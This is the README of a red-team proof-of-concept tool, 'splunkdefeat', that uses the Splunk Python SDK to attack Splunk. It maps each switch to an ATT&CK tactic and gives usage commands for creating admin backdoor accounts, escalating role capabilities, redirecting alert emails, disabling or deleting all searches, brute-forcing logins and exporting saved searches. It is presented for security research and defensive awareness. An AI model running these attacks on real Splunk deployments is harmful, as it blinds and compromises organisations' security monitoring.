splunkdefeat is a Splunk Enterprise SDK for Python wrapper to help red teamers conduct multiple attack techniques against Splunk. The motivation for this proof-of-concept tool was to illustrate practical attacks against Splunk, the associated risks, and how defenders can implement countermeasures. The author assumes no liability for use of this tool.
A more detailed write-up can be found here: splunkdefeat — A Splunk SDK wrapper for red teams
Clone the repository:
git clone [email protected]:markernest0/splunkdefeat.git
splunkdefeat depends on the python-dotenv, prettytable and splunk-sdk python modules.
Install the python dependencies:
pip install -r requirements.txt
| Short Form | Long Form | Description | Tactic | Technique | Sub-Technique |
|---|---|---|---|---|---|
| -h | --help | show this help message and exit | - | - | - |
| -au | --add_user | Enter the username to create | Persistence | Create Account | Cloud Account |
| -ap | --assign_password | Enter the password of the new user | Persistence | Create Account | Cloud Account |
| -ar | --assign_role | Specify the role of the new user (default choice is admin). Choices: {admin,power,user} | Persistence | Create Account | Cloud Account |
| -ur | --update_role | Specify the role to update with a capability. Choices: {admin,power,user} | Persistence | Account Manipulation | Additional Cloud Roles |
| -uc | --update_capability | Specify the capability to add to a role. Choices: {admin_all_objects, schedule_search, edit_user,mdelete_by_keyword, all} | Persistence | Account Manipulation | Additional Cloud Roles |
| -ue | --update_email | Enter the new email address for alerts | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -ds | --disable_searches | Disable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -es | --enable_searches | Enable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -sh | --splunk_host | Domain name or IP address to enumerate | Credential Access | Brute Force | - |
| -sp | --splunk_port | Connect to the host on the tcp port. default=8089 | Credential Access | Brute Force | - |
| -su | --splunk_user | Specify the username | Credential Access | Brute Force | - |
| -sf | --password_file | Specify the use of a password file | Credential Access | Brute Force | - |
| -lu | --list_user | List current user | Discovery | Account Discovery | Cloud Account |
| -la | --list_all | List all users | Discovery | Account Discovery | Cloud Account |
| -lr | --list_roles | List all roles | Discovery | Permission Groups Discovery | Cloud Groups |
| -ls | --list_searches | List all searches | Discovery | Cloud Service Discovery | - |
| -ss | --save_searches | Save all searches locally | Exfiltration | Automated Exfiltration | - |
| -du | --delete_user | Delete a specific user | Impact | Account Access Removal | - |
| -rs | --delete_searches | Delete all searches | Impact | Data Destruction | - |
| -ms | --manipulate_searches | Manipulate all searches | Impact | Stored Data Manipulation | - |
- To list all the options and switches use the -h switch:
python splunkdefeat.py -h
- Create a new user use the -au, -ap, and -ar switches:
python splunkdefeat.py -au splunk-replicate -ap mypassword123 -ar admin
- Modify a role with additional capabilities
python splunkdefeat.py -ur admin -uc delete_by_keyword
- Update the email for all search alert actions
python splunkdefeat.py -ue [email protected]
- Disable all searches
python splunkdefeat.py -ds
- Enable all searches
python splunkdefeat.py -es
- Brute force a user
python splunkdefeat.py -sh splunk.example.com -sp 8089 -su sc_admin -sf
- List current user and role
python splunkdefeat.py -lu
- List all users and roles
python splunkdefeat.py -la
- List all roles and capabilities
python splunkdefeat.py -lr
- List all searches
python splunkdefeat.py -ls
- Download all saved searches locally
python splunkdefeat.py -ss
- Delete a user
python splunkdefeat.py -du user_a
- Delete all searches
python splunkdefeat.py -rs
- Manipulate all searches
python splunkdefeat.py -ms